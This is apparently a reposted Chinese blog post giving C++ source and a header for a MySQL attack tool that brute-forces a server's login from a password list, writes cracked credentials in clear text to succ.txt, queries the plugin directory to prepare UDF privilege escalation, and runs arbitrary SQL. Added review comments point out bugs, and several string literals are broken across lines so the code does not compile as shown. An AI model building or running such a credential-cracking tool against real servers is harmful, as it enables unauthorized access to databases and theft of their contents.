Mysql 利用小工具源码

#include "StdAfx.h"
#include "Sql.h"
#include <windows.h>
#include <stdio.h>
#include <mysql.h>

#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")  
#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib") 
#if defined _DEBUG  
#pragma comment(lib, "mysqlclient_debug.lib")   
#else  
#pragma comment(lib, "mysqlclient.lib")  
#endif
#pragma comment(lib, "wsock32.lib")  
#pragma comment(lib, "Advapi32.lib") 

// Default constructor. Sql declares no data members, so there is nothing
// to initialise.
Sql::Sql() {}


// Destructor. The class owns no resources; connections and files are opened
// and closed inside the individual methods.
Sql::~Sql() {}

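// Appends the NUL-terminated string in buffer to succ.txt in the current
// working directory. The write is best-effort: if the file cannot be opened
// the call returns without reporting an error, as before.
//
// crack_mysql passes the line that contains host, user name and password, so
// succ.txt ends up holding credentials in clear text and should be treated
// as a sensitive file.
//
// Fix: the original called fclose(fp) even when fopen had failed, which
// passes a null FILE pointer to fclose. A null buffer is now ignored too.
void Sql::writefiles(char* buffer)
{
    if (buffer == NULL)
    {
        return;
    }

    FILE* fp = fopen("succ.txt","a+");
    if (fp == NULL)
    {
        return;
    }

    fwrite(buffer,strlen(buffer),1,fp);
    fclose(fp);
}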

// Prints the two supported command-line forms, with help printed as the
// program name (main passes argv[0]), then terminates the process.
// NOTE(review): each format string below is split across two physical lines
// in this listing. Presumably a newline escape was lost when the page was
// extracted; the code does not compile as shown - confirm against the
// original before building.
// NOTE(review): exit(0) reports success although main calls this for a
// too-short argument list; a non-zero status would let callers detect that.
void Sql::Usage(char* help)
{
    printf("[-]:%s Usage:->192.168.1.1->root->crack
",help);
    printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()
",help);
    //return;
    exit(0);
}

// Makes one login attempt against the MySQL server at ServerHost with
// Username/password (default database mysql, CLIENT_MULTI_STATEMENTS set).
// On failure it prints the attempted credentials and closes the handle.
// On success it prints the credential line, appends it to succ.txt through
// writefiles, then runs four fixed queries (version, current user, database
// list, plugin directory) and prints the first column of every row.
// Always returns 0, so the caller cannot tell a successful login from a
// failed one.
// NOTE(review): several string literals below are split across physical
// lines in this listing; presumably newline escapes were lost when the page
// was extracted, so the code does not compile as shown - confirm against the
// original.
int Sql::crack_mysql(char* ServerHost,char* Username,char* password)
{
    MYSQL *conn;
    MYSQL_RES *res;
    MYSQL_ROW row;
    char plugs[1024];
    // NOTE(review): the mysql_init result is not checked before it is used.
    conn = mysql_init(NULL);
    char buffer[1024] = {0};

    // NOTE(review): count is never read.
    int count = 0;
    char* Sql_exec[4] = {"select version()","select user()","show databases","select @@plugin_dir"};

    if (!mysql_real_connect(conn,ServerHost,
        Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
    {
        printf("Host:%s->Username:%s->Password:%s failed
",ServerHost,Username,password);
        mysql_close(conn);
    }else
    {
        memset(buffer,0,sizeof(buffer));
        sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly

",ServerHost,Username,password);
        // NOTE(review): buffer is passed as the format string. It holds the
        // host, user name and password, so any percent sign in them is
        // interpreted as a conversion specifier; printing it through an
        // explicit %s format would avoid that.
        printf(buffer);
        // Persists the credential line to succ.txt in clear text.
        writefiles(buffer);

        // A failure to select the mysql database is reported but not treated
        // as fatal; the queries below still run.
        if (mysql_select_db(conn,"mysql"))
        {
            printf("Select Errors the mysql database!
");
        }

        for (int i =0;i<4;i++)
        {
            if (mysql_query(conn,Sql_exec[i]))
            {
                fprintf(stderr,"%s
",mysql_error(conn));
                //exit(1);
            }

            // NOTE(review): this is reached even when mysql_query failed, and
            // res is not checked for NULL before mysql_fetch_row uses it.
            res = mysql_use_result(conn);
            //res = mysql_store_result(conn);

            while ((row = mysql_fetch_row(res)) != NULL)
            {
                // NOTE(review): row[0] is used without a NULL check; the
                // MySQL C API returns a null pointer for a SQL NULL column,
                // so confirm none of the four queries can produce one.
                sprintf_s(plugs,"%s",row[0]);
                printf("%s
",plugs);
            }
        }
        // NOTE(review): only the result set of the last iteration is freed;
        // the three earlier ones are never released.
        mysql_free_result(res);
        mysql_close(conn);
    }
    return 0;
}

// Connects to the MySQL server at ServerHost with Username/password (default
// database mysql, CLIENT_MULTI_STATEMENTS set), runs the statement in sql and
// prints the first column of every row of the stored result.
// Returns -2 when mysql_store_result yields no result, otherwise 0; a failed
// connection also returns 0.
// NOTE(review): the credentials are echoed to stderr on both the success and
// the failure path.
// NOTE(review): several string literals below are split across physical
// lines in this listing; presumably newline escapes were lost when the page
// was extracted, so the code does not compile as shown - confirm against the
// original.
int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql)
{
    MYSQL *conn;
    MYSQL_RES *res;
    MYSQL_ROW row;
    char plugs[1024];
    // NOTE(review): the mysql_init result is not checked before it is used.
    conn = mysql_init(NULL);

    // NOTE(review): count is never read.
    int count = 0;

    if (mysql_real_connect(conn,ServerHost,
        Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
    {
        fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly

",ServerHost,Username,password);

        // A failure to select the mysql database is reported but not treated
        // as fatal.
        if (mysql_select_db(conn,"mysql"))
        {
            printf("Select Errors the mysql database!
");
        }

        // sql is sent unchanged; main passes argv[5] here. With
        // CLIENT_MULTI_STATEMENTS several statements may be sent at once, but
        // only the first result set is read below.
        if (mysql_query(conn,sql))
        {
            fprintf(stderr,"%s
",mysql_error(conn));
            //exit(1);
        }
        // NOTE(review): this early return leaves conn open. mysql_store_result
        // also returns NULL for statements that produce no result set, so -2
        // does not by itself mean the statement failed.
        if (!(res = mysql_store_result(conn)))
        {
            return -2;
        }

        while ((row = mysql_fetch_row(res)) != NULL)
        {
            ZeroMemory(plugs,sizeof(plugs));
            // NOTE(review): row[0] is used without a NULL check; the MySQL C
            // API returns a null pointer for a SQL NULL column. Only the
            // first column of each row is printed.
            sprintf_s(plugs,"%s",row[0]);
            printf("%s
",plugs);
        }
        mysql_free_result(res);
        mysql_close(conn);
    }else
    {
        // NOTE(review): the handle from mysql_init is not closed on this path.
        fprintf(stderr,"Host:%s->Username:%s->Password:%s failed
",ServerHost,Username,password);
    }
    return 0;
}

// Entry point. argv[1] is the server host, argv[2] the user name and argv[3]
// the mode. A mode containing crack reads pass.txt line by line and calls
// crack_mysql once per line; a mode containing sql calls sql_exec with
// argv[4] as the password and argv[5] as the statement.
// NOTE(review): as written the crack branch makes one connection attempt per
// wordlist line for a single account from a single client, so on the server
// side it appears as a run of rejected logins for Username - the pattern that
// failed-login throttling and authentication-log alerting are meant to catch.
// NOTE(review): the character literals in the line-trimming code are empty
// or split across lines in this listing; presumably escapes such as a line
// terminator and the NUL character were lost in extraction, so the code does
// not compile as shown - confirm against the original.
int main(int argc,char* argv[])
{
    // NOTE(review): argv[1] to argv[3] are read before argc is checked, and
    // the check below only rejects argc < 3, so with exactly three arguments
    // method is the terminating null entry of argv and strstr receives NULL.
    char* ServerHost = argv[1];
    char* Username = argv[2];
    char* method = argv[3];
    // NOTE(review): newsql stays NULL for the whole function; every member
    // call through it is undefined behaviour even though the methods do not
    // touch member data. A stack object (Sql newsql;) would be well defined.
    Sql* newsql = NULL;
    FILE* fp = NULL;
    char buffer[MAX_PATH] = {0};
    if (argc < 3)
    {
        newsql->Usage(argv[0]);
    }

    // The mode is matched as a substring, not compared for equality.
    if (strstr(method,"crack"))
    {

        fp = fopen("pass.txt","rb");

        if (fp == NULL)
        {
            // NOTE(review): the message names pwd.txt but the file opened
            // above is pass.txt.
            printf("Error:%d, pwd.txt not found
",GetLastError());
            return 0;
        }
        while (fgets(buffer,MAX_PATH,fp) != NULL)
        {
            // NOTE(review): strlen(buffer) - 2 wraps around for a line shorter
            // than two characters, so the index can land far outside buffer;
            // the length should be checked before indexing.
            if (buffer[strlen(buffer) - 2] == '
')
            {
                buffer[strlen(buffer) - 2] = '';
            }

            if (buffer[strlen(buffer) - 2] == '
')
            {
                buffer[strlen(buffer) - 2] = '';
            }

            // The return value is ignored (crack_mysql always returns 0), so
            // the loop continues through the whole file regardless of outcome.
            newsql->crack_mysql(ServerHost,Username,buffer);
            memset(buffer,0,sizeof(buffer));
        }
        fclose(fp);
    }else if (strstr(method,"sql"))
    {
        // NOTE(review): argv[4] and argv[5] are read without checking that
        // argc is at least 6. The password is also taken from the command
        // line, where other local users can usually see it in the process
        // list.
        char* password = argv[4];
        char* sql = argv[5];
        newsql->sql_exec(ServerHost,Username,password,sql);
    }

    return 0;
}

头文件

#pragma once
// Groups the MySQL client helpers used by this tool. The class declares no
// data members; each method works only on the arguments it is given.
class Sql
{
public:
    // Construction and destruction do nothing.
    Sql();
    ~Sql();

    // Prints the supported command-line forms; help is shown as the program name.
    void Usage(char* help);

    // Appends buffer to the succ.txt log file.
    void writefiles(char* buffer);

    // Tries one login with the given credentials and, on success, prints the
    // output of a fixed set of informational queries.
    int crack_mysql(char* ServerHost, char* Username, char* password);

    // Logs in with the given credentials, runs sql and prints the first
    // column of each result row.
    int sql_exec(char* ServerHost, char* Username, char* password, char* sql);
};

本来还想写一个UDF 导出提权的,懒得写了。有兴趣的人可以自己去写。

原文地址:https://www.cnblogs.com/killbit/p/5088031.html